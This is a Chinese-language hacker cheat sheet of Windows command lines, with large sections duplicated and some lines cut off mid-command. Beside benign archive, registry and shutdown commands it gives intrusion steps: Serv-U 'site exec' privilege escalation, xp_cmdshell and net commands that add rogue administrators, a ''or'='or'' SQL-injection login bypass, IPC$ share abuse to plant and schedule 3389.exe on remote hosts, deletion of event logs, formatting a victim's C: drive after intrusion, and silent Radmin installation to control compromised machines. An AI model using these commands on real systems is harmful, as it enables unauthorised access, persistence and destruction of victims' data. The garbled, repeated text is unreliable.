Dos命令
rar下压缩与解压缩
"c:\progra~1\winrar\rar.exe" a d:\web\test\web1.rar d:\web\test\web1
"c:\progra~1\winrar\rar.exe" x d:\web\test\web1.rar d:\web\test\web1
注册表DOS导入导出命令
regedit -e d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
regedit -s d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
"c:\progra~1\winrar\rar.exe" a d:\web\test\web1.rar d:\web\test\web1
"c:\progra~1\winrar\rar.exe" x d:\web\test\web1.rar d:\web\test\web1
注册表DOS导入导出命令
regedit -e d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
regedit -s d:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
xp下查PID用tasklist win2000下查PID用pulist
杀进程 taskkill /pid id数字
杀进程ntsd -c q -p PID (PID是进程ID数字)
serv-u提权的利用
D:\wwwroot\ftp.exe "r_server.exe /port:7788 /pass:/yourpass /save" (修改radmin密码和端口)
D:\wwwroot\ftp.exe "net user badwolf nettu /add" (提升WEBshell权限)
D:\wwwroot\ftp.exe "net localgroup administrators 用户名 /add"(提升WEB权限)
--------------建立1个ftp用户------------
c:\program files\serv-u\servudaemon.ini
User9=nettu|1|0
杀进程 taskkill /pid id数字
杀进程ntsd -c q -p PID (PID是进程ID数字)
serv-u提权的利用
D:\wwwroot\ftp.exe "r_server.exe /port:7788 /pass:/yourpass /save" (修改radmin密码和端口)
D:\wwwroot\ftp.exe "net user badwolf nettu /add" (提升WEBshell权限)
D:\wwwroot\ftp.exe "net localgroup administrators 用户名 /add"(提升WEB权限)
--------------建立1个ftp用户------------
c:\program files\serv-u\servudaemon.ini
User9=nettu|1|0
[USER=nettu|1]
Password=zf98CFA3B714DEF62C490B8AD477CCAF3D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
然后DOS登陆ftp建立管理员
ftp> quote site exec net user badwolf 65901433 /add
ftp> quote site exec net localgroup administrators badwolf /add
------------------------------------------------------------------------------------------------------------------------------
sql命令
删除news表里的ID大于200 和 小于1000之间的内容
delete from news where (id>=200 and id<1000)
Password=zf98CFA3B714DEF62C490B8AD477CCAF3D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=c:\|RWAMELCDP
Access2=d:\|RWAMELCDP
然后DOS登陆ftp建立管理员
ftp> quote site exec net user badwolf 65901433 /add
ftp> quote site exec net localgroup administrators badwolf /add
------------------------------------------------------------------------------------------------------------------------------
sql命令
删除news表里的ID大于200 和 小于1000之间的内容
delete from news where (id>=200 and id<1000)
修改admin表下序号(ID)为1的password值为123456
update admin set password='123456' where id='1'
------------------------------------------------------------------------------------------------------------------------------
重起机器*.bat放在启动项里
@echo off
at 22:00 shutdown -r
cls
-----------------------------------------------------------
新建一个快捷方式,命令如下:
shutdown.exe -a 取消关机
shutdown.exe -s 关闭此计算机
shutdown.exe -f 强行关闭应用程序。
shutdown.exe -m \计算机名 控制远程计算机。
shutdown.exe -i 显示图形用户界面,但必须是Shutdown的第一个参数。
shutdown.exe -l 注销当前用户。
shutdown.exe -s 关闭此计算机
shutdown.exe -r 关机并重启。
shutdown.exe -t时间 设置关机倒计时。
shutdown.exe -c"消息内容" 输入关机对话框中的消息内容(不能超127个字符)。
然后在计划任务订时运行它就可以了!
---------------------------------DOS命令 - 列目录------------
dir c:\
dir d:\
---------------------------------DOS命令 - 添加管理员--------
net user badwolf badwolfo /add
net localGroup Administrators badwolf /add
---------------------------------SQL语句---------------------
javascript:s=document.documentElement.outerHTML;document.write
update admin set password='123456' where id='1'
------------------------------------------------------------------------------------------------------------------------------
重起机器*.bat放在启动项里
@echo off
at 22:00 shutdown -r
cls
-----------------------------------------------------------
新建一个快捷方式,命令如下:
shutdown.exe -a 取消关机
shutdown.exe -s 关闭此计算机
shutdown.exe -f 强行关闭应用程序。
shutdown.exe -m \计算机名 控制远程计算机。
shutdown.exe -i 显示图形用户界面,但必须是Shutdown的第一个参数。
shutdown.exe -l 注销当前用户。
shutdown.exe -s 关闭此计算机
shutdown.exe -r 关机并重启。
shutdown.exe -t时间 设置关机倒计时。
shutdown.exe -c"消息内容" 输入关机对话框中的消息内容(不能超127个字符)。
然后在计划任务订时运行它就可以了!
---------------------------------DOS命令 - 列目录------------
dir c:\
dir d:\
---------------------------------DOS命令 - 添加管理员--------
net user badwolf badwolfo /add
net localGroup Administrators badwolf /add
---------------------------------SQL语句---------------------
javascript:s=document.documentElement.outerHTML;document.write
('');document.body.innerText=s;
exec xp_cmdshell 'net user MyName 123456 /add'
exec xp_cmdshell 'net localGroup Administrators MyName /add'
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
---------------------------------一些命令行---------------------
\=%5c #=%23 asa和asp用迅雷下载
hack.exe 0或1 192.168.0.254 (溢出工具命令)
dir *.pwl /a/s (删除win98下的用户)
telnet ip 1234 (telnet对方1234是端口号)
net user badwolf nettu /add (建立用户)
net localgroup administrators 用户名 /add (这步是添加用户到管理组为管理员)
net use \\IP\ipc$ /user:"用户名" 密码 (与远程IP建立空连接)
net use x: \\192.168.0.254\c$ (做个影射)
type x:\boot.ini (看系统对方)
copy c:\3389.exe \\IP\C$ (拷贝文件过去了)
net time \\192.168.0.254 (看对方时间)
at \\IP 2:40 c:\3389.exe (设定某个时间执行3389重起机器)
at \\192.168.0.254 2:40 /every:2 c:\3389.exe(每月2日2:40执行3379.exe 换成/every:th是每星期4)
net use(查看网络状态)
net user(查看所有用户名)
net user administertor(查看administertor的属性)
net user administertor 123456(修改administertor的密码为123456)
net user administertor /delete(删除administertor用户)
net user guest /active:yes(开启激活GUEST,yes换no为禁用)
net user hacker /passwordchg:yes(指定hacker用户可以改自己的密码,yes换no为相反)
net user hacker /times:m,12am-2pm (指定hacker用户可以使用计算机时间,/time:all是任何时间,/time:空
是永远禁止)
net shaer ipc$(启动改共享)
net view (列出本地机的当前域中的计算机列表)
net view \\192.168.0.254(查看远程计算机共享资源)
net start(查看启动的服务)
net start server(启动相关服务,start换stop为禁止服务)
tracert www.163.com (测试本地与163之间经过的计算机)
ping IP(最简单命令了)
netstat -n(以数字的形式显示连接的IP和端口)
ftp 192.168.0.254(连接改IP的FTP)
ftp>put c:\3389.exe 3389.exe(copy 3389.exe到FPT上)
ftp>get 123.gif c:\123.gif(下载FTP上的123.gif到本地C:)
mdelete 123.gif(删除FTP上文件) mkdir abc(FTP上创建abc目录)bye(退出FTP)
简单先写这些啦...
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
------------------------------------------------------------------
开C的默认共享:
那么,我们鼠标右键点我的电脑管理-操作-连接到另1台计算机上-输入IP-确定-输入帐号密码-OK
点共享文件夹-共享-建立共享-直接输入c:\-共享名为c$-下1步完成。
------------------------------------------------------------------
删除默认共享:
net share(查看本机默认共享)
net share ipc$ /delete(删除ipc$,同理删除admin$ c$ d$一样)
net stop server /y(该服务提供的是RPC支持.文件.打印.命令管道共享.再改1段注册表是完全删除默认共项)
[HKEY_LOCAL_MACHINE\System\CurrentControl\Services\lanmanserver\parameters]
下的autoishaerwks-dward-00000000 和 autosharenerver-dward-00000000
------------------------------------------------------------------
查找虚拟主机:
http://whois.webhosting.info/ip
有漏洞后台万能密码:
'or'='or' 'or''='
直接查看网页源文件:
view-source:http://www.163.com
登陆终端时任务管理器:
CTRL+ALT+END(同本地的ctrl+alt+del)
入侵后格式化对方的C盘:
format c:/u /q /autotest
-------------------------------------------------------------------
radmin开启指令:
r_server.exe /install /silence
然后net start r_Server
exec xp_cmdshell 'net localGroup Administrators MyName /add'
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
---------------------------------一些命令行---------------------
\=%5c #=%23 asa和asp用迅雷下载
hack.exe 0或1 192.168.0.254 (溢出工具命令)
dir *.pwl /a/s (删除win98下的用户)
telnet ip 1234 (telnet对方1234是端口号)
net user badwolf nettu /add (建立用户)
net localgroup administrators 用户名 /add (这步是添加用户到管理组为管理员)
net use \\IP\ipc$ /user:"用户名" 密码 (与远程IP建立空连接)
net use x: \\192.168.0.254\c$ (做个影射)
type x:\boot.ini (看系统对方)
copy c:\3389.exe \\IP\C$ (拷贝文件过去了)
net time \\192.168.0.254 (看对方时间)
at \\IP 2:40 c:\3389.exe (设定某个时间执行3389重起机器)
at \\192.168.0.254 2:40 /every:2 c:\3389.exe(每月2日2:40执行3379.exe 换成/every:th是每星期4)
net use(查看网络状态)
net user(查看所有用户名)
net user administertor(查看administertor的属性)
net user administertor 123456(修改administertor的密码为123456)
net user administertor /delete(删除administertor用户)
net user guest /active:yes(开启激活GUEST,yes换no为禁用)
net user hacker /passwordchg:yes(指定hacker用户可以改自己的密码,yes换no为相反)
net user hacker /times:m,12am-2pm (指定hacker用户可以使用计算机时间,/time:all是任何时间,/time:空
是永远禁止)
net shaer ipc$(启动改共享)
net view (列出本地机的当前域中的计算机列表)
net view \\192.168.0.254(查看远程计算机共享资源)
net start(查看启动的服务)
net start server(启动相关服务,start换stop为禁止服务)
tracert www.163.com (测试本地与163之间经过的计算机)
ping IP(最简单命令了)
netstat -n(以数字的形式显示连接的IP和端口)
ftp 192.168.0.254(连接改IP的FTP)
ftp>put c:\3389.exe 3389.exe(copy 3389.exe到FPT上)
ftp>get 123.gif c:\123.gif(下载FTP上的123.gif到本地C:)
mdelete 123.gif(删除FTP上文件) mkdir abc(FTP上创建abc目录)bye(退出FTP)
简单先写这些啦...
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
------------------------------------------------------------------
开C的默认共享:
那么,我们鼠标右键点我的电脑管理-操作-连接到另1台计算机上-输入IP-确定-输入帐号密码-OK
点共享文件夹-共享-建立共享-直接输入c:\-共享名为c$-下1步完成。
------------------------------------------------------------------
删除默认共享:
net share(查看本机默认共享)
net share ipc$ /delete(删除ipc$,同理删除admin$ c$ d$一样)
net stop server /y(该服务提供的是RPC支持.文件.打印.命令管道共享.再改1段注册表是完全删除默认共项)
[HKEY_LOCAL_MACHINE\System\CurrentControl\Services\lanmanserver\parameters]
下的autoishaerwks-dward-00000000 和 autosharenerver-dward-00000000
------------------------------------------------------------------
查找虚拟主机:
http://whois.webhosting.info/ip
有漏洞后台万能密码:
'or'='or' 'or''='
直接查看网页源文件:
view-source:http://www.163.com
登陆终端时任务管理器:
CTRL+ALT+END(同本地的ctrl+alt+del)
入侵后格式化对方的C盘:
format c:/u /q /autotest
-------------------------------------------------------------------
radmin开启指令:
r_server.exe /install /silence
然后net start r_Server
RADMIN的安装命令是:
RADMIN是远程控制文件对肉鸡管理功能强大!但是他不属于木马类软件,所以不会被杀,但是容易发现。其实现在也他妈的杀了!当然看你用的哪个版本!
RADMIN是远程控制文件对肉鸡管理功能强大!但是他不属于木马类软件,所以不会被杀,但是容易发现。其实现在也他妈的杀了!当然看你用的哪个版本!
隐藏安装
RADMIN的安装命令是:
r_server.exe /install /silence /pass:** /port:** /save